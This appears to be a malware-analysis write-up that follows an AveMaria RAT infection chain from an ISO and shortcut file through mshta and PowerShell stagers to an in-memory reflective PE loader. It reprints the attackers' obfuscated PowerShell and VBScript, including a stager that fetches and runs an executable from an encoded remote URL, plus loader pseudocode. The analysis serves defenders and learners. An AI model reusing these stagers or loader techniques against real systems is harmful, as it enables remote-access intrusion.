• When a Shortcut Sings: Dissecting an AveMaria mshta Campaign End-to-End

    Author: Valli-Nayagam Chokkalingam

    Contents

    Introduction

    Not every infection chain worth studying is new. Some of the most instructive ones are simply well-built — stable, repeatable, and grounded in real attacker tradecraft. The campaign analyzed here comes from a slightly older AveMaria distribution wave documented by Zscaler ThreatLabz, where attackers relied on a staged delivery path using nothing more than Windows-native components to land a full remote-access foothold. No exploits, no macros, just a clean chain of execution from user interaction to C2.

    I chose this sample because it sits in the ideal learning zone for beginners: simple enough to reproduce in a lab, yet realistic enough to demonstrate how commodity malware actually arrives on endpoints. Each stage builds on the previous one — container, shortcut, mshta execution, staged download, in-memory unpacking — culminating in a fully functional RAT reaching out to its operator.

    In this post, we follow that chain all the way through. Not just “what runs,” but how it runs, what artifacts it leaves behind, and how the final payload transitions from an opaque blob into an active remote session. By the end, the goal is to see the entire path from initial click to live C2 — the moment the intrusion stops being a file and starts being an attacker.

    Figure 1. AveMaria Attack Chain.

    Stage 1 — The Delivery Vessel: An ISO That Isn’t What It Seems

    An ISO file is nothing more than a disk image — a byte-for-byte replica of what would normally live on a physical CD or DVD. Windows treats it accordingly. Double-click it, and the operating system quietly mounts the image as a new virtual drive, complete with its own drive letter, icon, and familiar folder view. No extraction tools, no warnings, no sense that anything unusual just happened. To the user, it looks like they’ve simply “opened” a folder that arrived via email or download.

    From an analysis perspective, mounting isn’t strictly necessary. Tools like 7-Zip can open ISO images directly, allowing investigators to inspect contents without triggering any automatic execution paths or altering system state. This makes it easier to examine the payload structure safely before interacting with it in a live environment.

    Attackers lean on this behavior because it strips away friction. Content inside the image bypasses several common web download protections and arrives already organized, already named, already staged. Once mounted, the files appear local and trustworthy — not something fetched from the internet moments earlier, but something that feels like removable media. It’s a subtle psychological shift that lowers suspicion before any code even executes.

    In this sample, the mounted image contains what appears to be an innocuous file named Documents.lnk. Not a PDF, not a Word file — a Windows shortcut. To a casual glance, it blends in perfectly with legitimate office artifacts, often carrying a document-style icon and a believable name. But unlike a real document, a shortcut doesn’t contain content. It contains instructions — where to go, what to launch, and which arguments to pass along. That single click becomes the pivot point where a harmless-looking container transitions into an execution chain.

    Figure 2. The campaign arrives as a deceptively small ISO, a container designed to look harmless while staging the real entry point inside.

    Figure 3. Opening the ISO mounts it as a virtual DVD drive, disguising attacker-controlled contents as trusted local media.

    Figure 4. The ISO contains a single file, documents.lnk, a malicious shortcut disguised as a legitimate document to trigger the next stage.

    Stage 2 — The Trigger: Weaponized Shortcut Execution

    Windows shortcut files (.lnk) are not documents at all — they are instruction containers. A shortcut simply tells Windows what to launch, where it lives, and which arguments to pass along when the user double-clicks it. This makes them ideal staging mechanisms: they look harmless, carry familiar icons, and execute instantly without raising the same suspicion as scripts or executables.

    A quick right-click → Properties is often enough to reveal the illusion. The Target field exposes the real command that will run, and in this case it points not to a document viewer but to PowerShell, already a strong indicator that the file’s purpose is execution rather than opening content. Attackers commonly hide long or obfuscated commands here, sometimes padded to push the malicious portion out of immediate view.

    Figure 5. Inspecting the shortcut’s properties reveals that the “document” actually launches PowerShell, exposing its true purpose as an execution trigger.

    For a deeper look, the shortcut can be opened directly in a hex editor such as HxD. Despite being a binary format, .lnk files frequently contain readable strings embedded within their structure. Scanning for ASCII or Unicode text quickly surfaces the full command line — a PowerShell invocation with encoded or obfuscated parameters that will fetch or execute the next stage. Extracting that command reveals the true role of the file: not a document launcher, but a compact delivery vehicle designed to turn a single click into controlled code execution.

    Figure 6. Viewing the shortcut in a hex editor exposes the embedded PowerShell command, revealing the hidden instructions executed on click.

    Stage 3 — Initial Loader: PowerShell Takes Control

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    -ExecutionPolicy UnRestricted
    $ErrorActionPreference=0;
    $YofWYC = $Null;
    $GMZglTzk = 'boytLhXGNtg.shkcpeHpK/LcY/fm~cttkxPsPmtKheBassahImetmhYYBcZQo/:iorC.Nha';
    sal xOXqeLV ($GMZglTzk[(-44676+44688)]+$GMZglTzk[(31996-31953)]+$GMZglTzk[(26559-26555)]);
    xOXqeLV uDFvHxvnl ($GMZglTzk[(-48812+48860)]+$GMZglTzk[(-57051+57068)]+$GMZglTzk[(-44482+44488)]);
    xOXqeLV csBsb ($GMZglTzk[(-28324+28351)]+$GMZglTzk[(-44676+44688)]+$GMZglTzk[(-7250+7255)]+$GMZglTzk[(-15622+15625)]+$GMZglTzk[(31996-31953)]);
    foreach($PVeYoE in @(
    (-8771+8776),(-65196+65199),(44578-44575),(-35487+35503),
    (-25222+25234),(53013-52951),(58129-58108),(-13523+13544),
    (-58933+58945),(-53822+53832),(60473-60470),(33846-33819),
    (-46252+46295),(3385-3320),(-20808+20822),(-8945+8962),
    (-47806+47809),(24980-24968),(-13291+13302),(28341-28326),
    (-36009+36010),(5565-5538),(37420-37399),(30164-30159),
    (46917-46906),(-9230+9235),(175-172),(12473-12430)
    )) {
    $YofWYC += $GMZglTzk[$PVeYoE]
    };
    uDFvHxvnl ("csBsb $YofWYC");

    Figure 7. Obfuscated PowerShell embedded in the shortcut reconstructs a hidden URL at runtime and fetches the next stage.

    The shortcut never tries to open a document at all — it simply fires off C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe with permissive flags (-ExecutionPolicy UnRestricted and $ErrorActionPreference = 0), handing control from Explorer straight to PowerShell. The script then sets up two variables: $GMZglTzk, a long, seemingly random string that functions as a character reservoir, and $YofWYC, an empty buffer that will hold the final output. Rather than invoking sensitive capabilities directly, it manufactures them on the fly. An alias named xOXqeLV resolves to Set-Alias, which is used to create uDFvHxvnl mapped to IEX (Invoke-Expression) and csBsb mapped to mshta. A loop walks through a list of computed indices, pulling one character at a time from $GMZglTzk to assemble a concealed address — https[:]//sgtmarkets[.]com/h.hta — that never appears in readable form until the script runs. The final line executes IEX (“mshta “), causing the legitimate mshta.exe binary to retrieve and execute the remote HTA content. Nothing is dropped to disk at this point; PowerShell’s job is simply to assemble the execution chain in memory and pass control to the next stage.

    Figure 8. With debug printing enabled, the script reveals its runtime behavior — reconstructing mshta and assembling the hidden URL character-by-character before initiating remote execution.

    Figure 9. Sysmon confirms PowerShell spawning mshta.exe with the reconstructed URL, validating the transition from in-memory loader to remote HTA execution.

    Stage 4 — The Pivot: HTA as a Script Host

    The chain now pivots into an HTA (HTML Application) — a file type that looks like a web page but executes as a local Windows application under mshta.exe. Unlike regular web content, HTAs execute outside the browser sandbox as local applications under mshta.exe, allowing VBScript/JScript to interact with the filesystem, registry, and COM interfaces using the current user’s privileges — a combination that makes them a dependable living-off-the-land launch mechanism. In this sample, nearly all of the script serves as intentional clutter: empty routines and arbitrary names surrounding a single decoding function that reconstructs the true payload from a large numeric array (shyNkdc). Each value is shifted by a fixed offset (59108) and converted via Chr(), assembling the final PowerShell command entirely at runtime. For analysis, the VBScript portion was extracted from the HTA (discarding the HTML wrapper and inert code) and converted into a minimal standalone .vbs script containing only the decoding routine and array. To safely reveal the payload without executing it, the VBScript logic extracted from the HTA was modified to show the decoded command in a message box, while the full decoded command is written to an output.txt file in the same directory. What initially appears as an impenetrable wall of numbers collapses into a simple, deterministic transformation — static encoded data in, clear executable command out — once the single functional component is isolated.

    Figure 10. Malicious HTA file containing embedded obfuscated VBScript that decodes and executes a hidden PowerShell command via mshta.exe.

    Option Explicit
    Function baxlA(ByVal debHiYVRjoZPX)
    baxlA = VarType(debHiYVRjoZPX)
    End Function
    Function sbtfmbzBZiKj(ByVal shyNkdc)
    Dim debHiYVRjoZPX
    Dim CadHFhmcICIK
    Dim JRpOiBwoWm
    Dim yDwRYqrX
    yDwRYqrX = 59108
    debHiYVRjoZPX = baxlA(shyNkdc)
    If debHiYVRjoZPX = 8204 Then
    For Each CadHFhmcICIK In shyNkdc
    JRpOiBwoWm = JRpOiBwoWm & Chr(CadHFhmcICIK - yDwRYqrX)
    Next
    End If
    sbtfmbzBZiKj = JRpOiBwoWm
    End Function
    Sub xzyqy()
    Dim shyNkdc
    Dim QYARDSPMooGQ
    shyNkdc = Array(59220,59219,59227,59209,59222,59223,59212,59209,59216,59216,59154,59209,59228,59209,59140,59153,59177,59228,59209,59207,59225,59224,59213,59219,59218,59188,59219,59216,59213,59207,59229,59140,59193,59218,59190,59209,59223,59224,59222,59213,59207,59224,59209,59208,59140,59210,59225,59218,59207,59224,59213,59219,59218,59140,59226,59208,59198,59184,59148,59144,59173,59192,59224,59212,59223,59194,59196,59189,59206,59176,59175,59225,59178,59152,59140,59144,59212,59230,59223,59226,59212,59228,59209,59194,59173,59224,59194,59189,59205,59225,59224,59149,59231,59199,59181,59187,59154,59178,59213,59216,59209,59201,59166,59166,59195,59222,59213,59224,59209,59173,59216,59216,59174,59229,59224,59209,59223,59148,59144,59173,59192,59224,59212,59223,59194,59196,59189,59206,59176,59175,59225,59178,59152,59140,59144,59212,59230,59223,59226,59212,59228,59209,59194,59173,59224,59194,59189,59205,59225,59224,59149,59233,59167,59210,59225,59218,59207,59224,59213,59219,59218,59140,59179,59207,59193,59176,59181,59227,59183,59211,59194,59148,59144,59173,59192,59224,59212,59223,59194,59196,59189,59206,59176,59175,59225,59178,59149,59231,59213,59210,59148,59144,59173,59192,59224,59212,59223,59194,59196,59189,59206,59176,59175,59225,59178,59154,59177,59218,59208,59223,59195,59213,59224,59212,59148,59148,59205,59230,59186,59207,59224,59192,59206,59177,59207,59215,59227,59206,59191,59198,59186,59211,59225,59140,59172,59148,59162,59164,59163,59161,59156,59152,59162,59164,59164,59156,59160,59152,59162,59164,59164,59157,59158,59152,59162,59164,59164,59157,59158,59149,59149,59149,59140,59153,59209,59221,59140,59144,59192,59222,59225,59209,59149,59231,59222,59225,59218,59208,59216,59216,59159,59158,59154,59209,59228,59209,59140,59144,59173,59192,59224,59212,59223,59194,59196,59189,59206,59176,59175,59225,59178,59140,59233,59209,59216,59223,59209,59213,59210,59148,59144,59173,59192,59224,59212,59223,59194,59196,59189,59206,59176,59175,59225,59178,59154,59177,59218,59208,59223,59195,59213,59224,59212,59148,59148,59205,59230,59186,59207,59224,59192,59206,59177,59207,59215,59227,59206,59191,59198,59186,59211,59225,59140,59172,59148,59162,59164,59163,59161,59156,59152,59162,59164,59164,59157,59162,59152,59162,59164,59164,59157,59165,59152,59162,59164,59163,59161,59159,59149,59149,59149,59140,59153,59209,59221,59140,59144,59192,59222,59225,59209,59149,59231,59220,59219,59227,59209,59222,59223,59212,59209,59216,59216,59154,59209,59228,59209,59140,59153,59177,59228,59209,59207,59225,59224,59213,59219,59218,59188,59219,59216,59213,59207,59229,59140,59225,59218,59222,59209,59223,59224,59222,59213,59207,59224,59209,59208,59140,59153,59178,59213,59216,59209,59140,59144,59173,59192,59224,59212,59223,59194,59196,59189,59206,59176,59175,59225,59178,59233,59209,59216,59223,59209,59231,59191,59224,59205,59222,59224,59153,59188,59222,59219,59207,59209,59223,59223,59140,59144,59173,59192,59224,59212,59223,59194,59196,59189,59206,59176,59175,59225,59178,59233,59233,59167,59210,59225,59218,59207,59224,59213,59219,59218,59140,59220,59173,59198,59196,59190,59191,59206,59209,59182,59229,59213,59229,59217,59182,59196,59192,59195,59194,59212,59148,59144,59215,59174,59206,59211,59191,59190,59219,59220,59228,59190,59219,59176,59179,59196,59186,59179,59182,59179,59228,59181,59149,59231,59144,59212,59216,59229,59215,59193,59223,59178,59220,59206,59198,59181,59227,59176,59211,59226,59224,59186,59140,59169,59140,59186,59209,59227,59153,59187,59206,59214,59209,59207,59224,59140,59148,59205,59230,59186,59207,59224,59192,59206,59177,59207,59215,59227,59206,59191,59198,59186,59211,59225,59140,59172,59148,59162,59164,59163,59164,59158,59152,59162,59164,59164,59156,59161,59152,59162,59164,59164,59158,59156,59152,59162,59164,59163,59161,59156,59152,59162,59164,59163,59165,59157,59152,59162,59164,59164,59156,59161,59152,59162,59164,59164,59156,59158,59152,59162,59164,59163,59163,59157,59152,59162,59164,59164,59157,59158,59152,59162,59164,59164,59156,59165,59152,59162,59164,59164,59156,59161,59152,59162,59164,59164,59157,59160,59152,59162,59164,59164,59158,59156,59149,59149,59167,59199,59186,59209,59224,59154,59191,59209,59222,59226,59213,59207,59209,59188,59219,59213,59218,59224,59185,59205,59218,59205,59211,59209,59222,59201,59166,59166,59191,59209,59207,59225,59222,59213,59224,59229,59188,59222,59219,59224,59219,59207,59219,59216,59140,59169,59140,59199,59186,59209,59224,59154,59191,59209,59207,59225,59222,59213,59224,59229,59188,59222,59219,59224,59219,59207,59219,59216,59192,59229,59220,59209,59201,59166,59166,59192,59184,59191,59157,59158,59167,59144,59212,59230,59223,59226,59212,59228,59209,59194,59173,59224,59194,59189,59205,59225,59224,59140,59169,59140,59144,59212,59216,59229,59215,59193,59223,59178,59220,59206,59198,59181,59227,59176,59211,59226,59224,59186,59154,59176,59219,59227,59218,59216,59219,59205,59208,59176,59205,59224,59205,59148,59144,59215,59174,59206,59211,59191,59190,59219,59220,59228,59190,59219,59176,59179,59196,59186,59179,59182,59179,59228,59181,59149,59167,59222,59209,59224,59225,59222,59218,59140,59144,59212,59230,59223,59226,59212,59228,59209,59194,59173,59224,59194,59189,59205,59225,59224,59233,59167,59210,59225,59218,59207,59224,59213,59219,59218,59140,59205,59230,59186,59207,59224,59192,59206,59177,59207,59215,59227,59206,59191,59198,59186,59211,59225,59148,59144,59192,59180,59179,59208,59207,59209,59149,59231,59144,59186,59194,59226,59207,59206,59197,59176,59186,59185,59197,59186,59169,59162,59164,59163,59156,59160,59167,59144,59173,59229,59176,59222,59184,59198,59184,59229,59187,59196,59169,59144,59186,59225,59216,59216,59167,59210,59219,59222,59209,59205,59207,59212,59148,59144,59182,59223,59230,59205,59206,59193,59223,59221,59230,59140,59213,59218,59140,59144,59192,59180,59179,59208,59207,59209,59149,59231,59144,59173,59229,59176,59222,59184,59198,59184,59229,59187,59196,59151,59169,59199,59207,59212,59205,59222,59201,59148,59144,59182,59223,59230,59205,59206,59193,59223,59221,59230,59153,59144,59186,59194,59226,59207,59206,59197,59176,59186,59185,59197,59186,59149,59233,59167,59222,59209,59224,59225,59222,59218,59140,59144,59173,59229,59176,59222,59184,59198,59184,59229,59187,59196,59233,59167,59210,59225,59218,59207,59224,59213,59219,59218,59140,59222,59209,59178,59180,59216,59188,59198,59189,59209,59148,59149,59231,59144,59190,59196,59185,59226,59196,59221,59210,59228,59220,59195,59181,59212,59226,59210,59186,59140,59169,59140,59144,59209,59218,59226,59166,59173,59220,59220,59176,59205,59224,59205,59140,59151,59140,59147,59200,59147,59167,59144,59215,59213,59175,59220,59215,59220,59181,59224,59175,59192,59209,59196,59209,59208,59174,59182,59195,59180,59205,59184,59223,59140,59169,59140,59144,59190,59196,59185,59226,59196,59221,59210,59228,59220,59195,59181,59212,59226,59210,59186,59140,59151,59140,59147,59176,59154,59220,59208,59210,59147,59167,59181,59210,59148,59192,59209,59223,59224,59153,59188,59205,59224,59212,59140,59153,59188,59205,59224,59212,59140,59144,59215,59213,59175,59220,59215,59220,59181,59224,59175,59192,59209,59196,59209,59208,59174,59182,59195,59180,59205,59184,59223,59149,59231,59181,59218,59226,59219,59215,59209,59153,59181,59224,59209,59217,59140,59144,59215,59213,59175,59220,59215,59220,59181,59224,59175,59192,59209,59196,59209,59208,59174,59182,59195,59180,59205,59184,59223,59167,59233,59177,59216,59223,59209,59231,59140,59144,59194,59198,59186,59229,59194,59225,59221,59181,59217,59179,59195,59198,59220,59220,59226,59140,59169,59140,59220,59173,59198,59196,59190,59191,59206,59209,59182,59229,59213,59229,59217,59182,59196,59192,59195,59194,59212,59140,59148,59205,59230,59186,59207,59224,59192,59206,59177,59207,59215,59227,59206,59191,59198,59186,59211,59225,59140,59172,59148,59162,59164,59164,59156,59164,59152,59162,59164,59164,59158,59156,59152,59162,59164,59164,59158,59156,59152,59162,59164,59164,59157,59162,59152,59162,59164,59164,59157,59165,59152,59162,59164,59163,59162,59158,59152,59162,59164,59163,59161,59157,59152,59162,59164,59163,59161,59157,59152,59162,59164,59164,59157,59165,59152,59162,59164,59164,59156,59163,59152,59162,59164,59164,59158,59156,59152,59162,59164,59164,59157,59159,59152,59162,59164,59164,59156,59157,59152,59162,59164,59164,59157,59164,59152,59162,59164,59164,59157,59157,59152,59162,59164,59164,59156,59161,59152,59162,59164,59164,59158,59156,59152,59162,59164,59164,59157,59165,59152,59162,59164,59163,59161,59156,59152,59162,59164,59164,59156,59159,59152,59162,59164,59164,59157,59161,59152,59162,59164,59164,59157,59159,59152,59162,59164,59163,59161,59157,59152,59162,59164,59163,59163,59158,59152,59162,59164,59163,59161,59156,59152,59162,59164,59164,59157,59162,59152,59162,59164,59164,59156,59160,59152,59162,59164,59164,59156,59162,59149,59149,59167,59226,59208,59198,59184,59140,59144,59215,59213,59175,59220,59215,59220,59181,59224,59175,59192,59209,59196,59209,59208,59174,59182,59195,59180,59205,59184,59223,59140,59144,59194,59198,59186,59229,59194,59225,59221,59181,59217,59179,59195,59198,59220,59220,59226,59167,59181,59218,59226,59219,59215,59209,59153,59181,59224,59209,59217,59140,59144,59215,59213,59175,59220,59215,59220,59181,59224,59175,59192,59209,59196,59209,59208,59174,59182,59195,59180,59205,59184,59223,59167,59233,59167,59144,59228,59183,59211,59196,59140,59169,59140,59144,59190,59196,59185,59226,59196,59221,59210,59228,59220,59195,59181,59212,59226,59210,59186,59140,59151,59140,59147,59217,59224,59160,59154,59209,59228,59209,59147,59167,59140,59213,59210,59140,59148,59192,59209,59223,59224,59153,59188,59205,59224,59212,59140,59153,59188,59205,59224,59212,59140,59144,59228,59183,59211,59196,59149,59231,59179,59207,59193,59176,59181,59227,59183,59211,59194,59140,59144,59228,59183,59211,59196,59167,59233,59177,59216,59223,59209,59231,59140,59144,59197,59220,59179,59179,59205,59205,59180,59174,59226,59184,59229,59198,59229,59140,59169,59140,59220,59173,59198,59196,59190,59191,59206,59209,59182,59229,59213,59229,59217,59182,59196,59192,59195,59194,59212,59140,59148,59205,59230,59186,59207,59224,59192,59206,59177,59207,59215,59227,59206,59191,59198,59186,59211,59225,59140,59172,59148,59162,59164,59164,59156,59164,59152,59162,59164,59164,59158,59156,59152,59162,59164,59164,59158,59156,59152,59162,59164,59164,59157,59162,59152,59162,59164,59164,59157,59165,59152,59162,59164,59163,59162,59158,59152,59162,59164,59163,59161,59157,59152,59162,59164,59163,59161,59157,59152,59162,59164,59164,59157,59165,59152,59162,59164,59164,59156,59163,59152,59162,59164,59164,59158,59156,59152,59162,59164,59164,59157,59159,59152,59162,59164,59164,59156,59157,59152,59162,59164,59164,59157,59164,59152,59162,59164,59164,59157,59157,59152,59162,59164,59164,59156,59161,59152,59162,59164,59164,59158,59156,59152,59162,59164,59164,59157,59165,59152,59162,59164,59163,59161,59156,59152,59162,59164,59164,59156,59159,59152,59162,59164,59164,59157,59161,59152,59162,59164,59164,59157,59159,59152,59162,59164,59163,59161,59157,59152,59162,59164,59164,59157,59159,59152,59162,59164,59164,59158,59156,59152,59162,59164,59163,59161,59162,59152,59162,59164,59163,59161,59156,59152,59162,59164,59164,59156,59161,59152,59162,59164,59164,59158,59160,59152,59162,59164,59164,59156,59161,59149,59149,59167,59226,59208,59198,59184,59140,59144,59228,59183,59211,59196,59140,59144,59197,59220,59179,59179,59205,59205,59180,59174,59226,59184,59229,59198,59229,59167,59179,59207,59193,59176,59181,59227,59183,59211,59194,59140,59144,59228,59183,59211,59196,59167,59233,59167,59167,59167,59167,59233,59222,59209,59178,59180,59216,59188,59198,59189,59209,59167)
    QYARDSPMooGQ = sbtfmbzBZiKj(shyNkdc)
    MsgBox QYARDSPMooGQ, 64, "Decoded Output (QYARDSPMooGQ)"
    Dim fso, f
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set f = fso.CreateTextFile("C:\decoded_output.txt", True)
    f.WriteLine QYARDSPMooGQ
    f.Close
    WScript.Echo QYARDSPMooGQ
    End Sub
    xzyqy

    Figure 11. VBScript decoding logic extracted from the HTA that subtracts a fixed offset (59108) from an integer array to reconstruct and reveal the hidden PowerShell command.

    Figure 12. Message box displaying the decoded command output produced by the HTA’s embedded VBScript decoder logic.

    Figure 13. Sysmon confirming the decoded HTA payload in action: mshta.exe launches the HTA, which spawns PowerShell executing the reconstructed, heavily obfuscated command responsible for staging and running the next stage.

    Stage 5 — The Delivery: PowerShell Retrieves the Payload

    Stage 5 is where the “mystery blob” finally turns into something real. The HTA doesn’t drop an EXE directly — it hands off to a PowerShell routine that behaves like a tiny installer: resolve a URL, pull raw bytes over HTTPS, write them to disk, then execute based on file type.

    At the heart of this stage are four helpers:

    1. Decode-NumberArrayToString: turns numeric arrays into strings by subtracting a fixed offset (68704). This is how the script hides obvious indicators like class names, extensions, and URLs until runtime.
    2. Download-BytesFromUrl: instantiates a decoded .NET WebClient object, forces TLS 1.2, and downloads the payload as a byte array (DownloadData()).
    3. Write-BytesToFile: persists those bytes using IO.File::WriteAllBytes().
    4. Invoke-ByFileType: a crude dispatcher that checks the file extension (also decoded at runtime) and chooses how to run it:
      • .dll → rundll32.exe
      • .ps1 → powershell.exe -File
      • anything else → Start-Process

    The actual delivery logic is in Stage-And-Execute-Payload, and it’s intentionally “quietly redundant.” It uses AppData as a staging directory and tries to keep re-downloading to a minimum:

    1. It targets AppData\D.pdf. If it already exists, it simply opens it (Invoke-Item). If not, it downloads bytes from a decoded URL, writes the file, then opens it.
    2. It then targets AppData\mt4.exe. Same deal: if present, execute; if missing, download from a second decoded URL, write it, and run it via the type-based launcher.

    That structure matters. It’s not just “download and run” — it’s “download once, reuse forever.” The persistence isn’t scheduled-task based here; it’s behavioral: the script is built to resume cleanly and keep moving forward even if it’s executed multiple times.

    What looks like messy obfuscation (arrays everywhere, meaningless variable names) is mostly misdirection. Functionally, Stage 5 is a straightforward pipeline:

    decode → download → write → execute, twice — first for a decoy-looking “PDF,” then for the real executable (mt4.exe).

    function Write-BytesToFile($filePath, $bytes)
    {
    [IO.File]::WriteAllBytes($filePath, $bytes)
    }
    function Execute-FileBasedOnType($filePath)
    {
    if ($filePath.EndsWith((Decode-NumberArrayToString @(68750,68804,68812,68812))) -eq $True)
    {
    rundll32.exe $filePath
    }
    elseif ($filePath.EndsWith((Decode-NumberArrayToString @(68750,68816,68819,68753))) -eq $True)
    {
    powershell.exe -ExecutionPolicy Unrestricted -File $filePath
    }
    else
    {
    Start-Process $filePath
    }
    }
    function Download-BytesFromUrl($url)
    {
    $webClient = New-Object (Decode-NumberArrayToString @(68782,68805,68820,68750,68791,68805,68802,68771,68812,68809,68805,68814,68820))
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12
    $payloadBytes = $webClient.DownloadData($url)
    return $payloadBytes
    }
    function Decode-NumberArrayToString($encodedNumbers)
    {
    $offset = 68704
    $decodedString = $Null
    foreach ($num in $encodedNumbers)
    {
    $decodedString += [char]($num - $offset)
    }
    return $decodedString
    }
    function Stage-And-Execute-Payload()
    {
    $appDataPath = $env:AppData + '\'
    $pdfPayloadPath = $appDataPath + 'D.pdf'
    if (Test-Path -Path $pdfPayloadPath)
    {
    Invoke-Item $pdfPayloadPath
    }
    else
    {
    $pdfPayloadBytes = Download-BytesFromUrl(
    Decode-NumberArrayToString @(68808,68820,68820,68816,68819,68762,68751,68751,68819,68807,68820,68813,68801,68818,68811,68805,68820,68819,68750,68803,68815,68813,68751,68772,68750,68816,68804,68806)
    )
    Write-BytesToFile $pdfPayloadPath $pdfPayloadBytes
    Invoke-Item $pdfPayloadPath
    }
    $exePayloadPath = $appDataPath + 'mt4.exe'
    if (Test-Path -Path $exePayloadPath)
    {
    Execute-FileBasedOnType $exePayloadPath
    }
    else
    {
    $exePayloadBytes = Download-BytesFromUrl(
    Decode-NumberArrayToString @(68808,68820,68820,68816,68819,68762,68751,68751,68819,68807,68820,68813,68801,68818,68811,68805,68820,68819,68750,68803,68815,68813,68751,68813,68820,68756,68750,68805,68824,68805)
    )
    Write-BytesToFile $exePayloadPath $exePayloadBytes
    Execute-FileBasedOnType $exePayloadPath
    }
    }
    Stage-And-Execute-Payload

    Figure 14. Obfuscated PowerShell delivery routine (function names & variables renamed for clarity) that decodes embedded URLs, downloads payload bytes to the AppData directory, writes them to disk, and executes the files based on their type.

    Stage 6 — Final Payload: Primary Implant

    Opening mt4.exe in IDA reveals a packed executable whose entry point invokes sub_401060 and sub_401070, signaling a loader stub rather than the true implant logic. The routine sub_401060 suppresses visible artifacts by hiding the console window via GetConsoleWindow and ShowWindow, while sub_401070 implements the actual unpacking stage: it allocates a large RWX region with VirtualAlloc, reconstructs an embedded payload by bitwise inversion of data from the .data section (unk_50C77C), and applies additional XOR-based decryption using a repeating key stored in v13. Memory protections are altered with VirtualProtect, and the MessageBoxA pointer is temporarily overwritten, followed by extremely heavy GUI call loops consistent with anti-analysis timing delays. Once reconstruction is complete, execution pivots into the decoded in-memory payload via the function pointer v4 (the shellcode entry), after which the process enters a sustained sleep loop — confirming that the real implant never exists on disk in unpacked form and is exposed only at runtime.

    Figure 15. Program entry point showing a minimal loader stub where main() immediately transfers control to sub_401060 (console hiding) followed by sub_401070 (primary unpacking routine), indicating the absence of legitimate application logic.

    Figure 16. Routine sub_401060 retrieves the process console window via GetConsoleWindow and hides it using ShowWindow(SW_HIDE), a common stealth technique to suppress visible execution.

    Figure 17. Memory-resident unpacking workflow showing RWX allocation, staged blob reconstruction, XOR-based decryption, and final execution pivot into the in-memory shellcode.

    Figure 18. Entry point of the decrypted shellcode showing the initial loader stub preparing registers and stack arguments before transferring execution to the next stage.

    Figure 19. Decrypted payload PE located immediately after the shellcode loader in memory, exposing the embedded executable structure with visible MZ and PE headers.

    Stepping deeper into the unpacked shellcode extracted from mt4.exe, the role of the stub becomes clear fairly quickly. The shellcode is not the final payload itself. Instead, it behaves as a reflective PE loader — a compact routine designed to reconstruct and execute another executable directly in memory.

    Rather than dropping a file to disk and launching it in the conventional way, the loader rebuilds a complete PE image inside the process address space. In other words, the code is manually performing the same tasks normally handled by the Windows loader: parsing headers, allocating memory, mapping sections, resolving imports, applying relocations, and finally jumping into the payload’s entry point. The difference is that every step happens inside memory, leaving very little traditional footprint behind.

    Figure 20. IDA pseudocode excerpt showing the shellcode which loads the decrypted payload into memory.

    Resolving Required APIs

    The first thing the loader does is resolve a handful of Windows APIs dynamically. Instead of relying on the import table, the code calls a helper routine. This function walks loaded modules, hashes exported function names, and returns the address of whichever function matches the supplied hash.

    In practice this means the loader reconstructs its API table at runtime.

    Pseudocode:

    LoadLibraryPtr = resolve_by_hash(HASH_LoadLibraryA)
    GetProcAddressPtr = resolve_by_hash(HASH_GetProcAddress)
    VirtualAllocPtr = resolve_by_hash(HASH_VirtualAlloc)
    VirtualProtectPtr = resolve_by_hash(HASH_VirtualProtect)
    ZwFlushInstructionCache = resolve_by_hash(HASH_ZwFlushInstructionCache)
    GetNativeSystemInfo = resolve_by_hash(HASH_GetNativeSystemInfo)

    Figure 21. API resolution via hashed lookups removes visible imports from the binary, requiring functionality to be reconstructed during runtime analysis.

    Locating the PE Header

    Once the API pointers are available, the loader begins parsing the embedded PE image.

    The starting point is the familiar e_lfanew offset inside the DOS header. By adding this value to the base of the in-memory buffer, the loader lands directly at the NT header.

    Conceptually it looks like this:

    DOS_HEADER = (IMAGE_DOS_HEADER*)peImageBuffer
    PE_HEADER = (IMAGE_NT_HEADERS*)(peImageBuffer + DOS_HEADER->e_lfanew)

    Figure 22. The loader locates the NT header via the e_lfanew offset, gaining full access to the embedded PE structure for subsequent reconstruction.

    Basic PE Validation

    Before doing anything expensive, the code performs a few sanity checks.

    It verifies:

    1. the “PE” signature
    2. the expected architecture (x86 in this case)
    3. several optional header flags

    If any of these checks fail, the loader simply aborts.

    if PE_HEADER->Signature != "PE"
    return 0
    if PE_HEADER->FileHeader.Machine != IMAGE_FILE_MACHINE_I386
    return 0
    if invalid_header_flags
    return 0

    Figure 23. Initial header validation checks confirm the embedded buffer contains a valid PE executable before the loader proceeds with reconstruction.

    Determining Image Size

    Next the loader walks through the section headers to determine how large the reconstructed image will need to be.

    Each section contributes a range defined by its virtual address and size. The loader tracks the highest end address across all sections.

    max_end = 0
    for each section in PE_HEADER->Sections
    {
    end = section.VirtualAddress + section.VirtualSize
    if end > max_end
    max_end = end
    }

    Figure 24. The computed maximum section boundary defines the total memory footprint required for the executable once mapped into memory.

    Allocating Memory for the Image

    With the required size known, the loader allocates a new memory region where the reconstructed image will live.

    allocated_image = VirtualAllocPtr(
    NULL,
    PE_HEADER->OptionalHeader.SizeOfImage,
    MEM_COMMIT | MEM_RESERVE,
    PAGE_READWRITE)

    Figure 25. Memory allocation for the reconstructed image, creating an empty region large enough to hold the full executable before section mapping begins.

    Copying the PE Headers

    The loader begins reconstructing the executable by copying the PE header region from the original buffer into the newly allocated image.

    However, the copy operation is not entirely straightforward. When the wipeHeaders flag is enabled, the loader intentionally scrubs most of the DOS header area while preserving the critical offset that points to the PE header.

    for i in range(SizeOfHeaders):
    if wipeHeaders
    and i < ntHeaderOffset
    and (i < 0x3C or i > 0x3E):
    allocated_image[i] = 0
    else:
    allocated_image[i] = original_image[i]

    Figure 26. Selective header reconstruction during image mapping: the loader zeros most of the DOS header region while preserving the e_lfanew pointer (offset 0x3C) required to locate the NT headers; once the copy reaches the NT header boundary, the remaining structures — including the PE signature, file header, and section headers — are copied normally, producing a functional in-memory image while stripping many recognizable DOS-header artifacts often used by memory scanners.

    Mapping the Sections

    With the headers in place, the loader begins copying the actual section data. Each section is placed at its intended virtual address inside the new memory region.

    for each section:
    destination = allocated_image + section.VirtualAddress
    source = original_image + section.PointerToRawData
    memcpy(destination, source, section.SizeOfRawData)

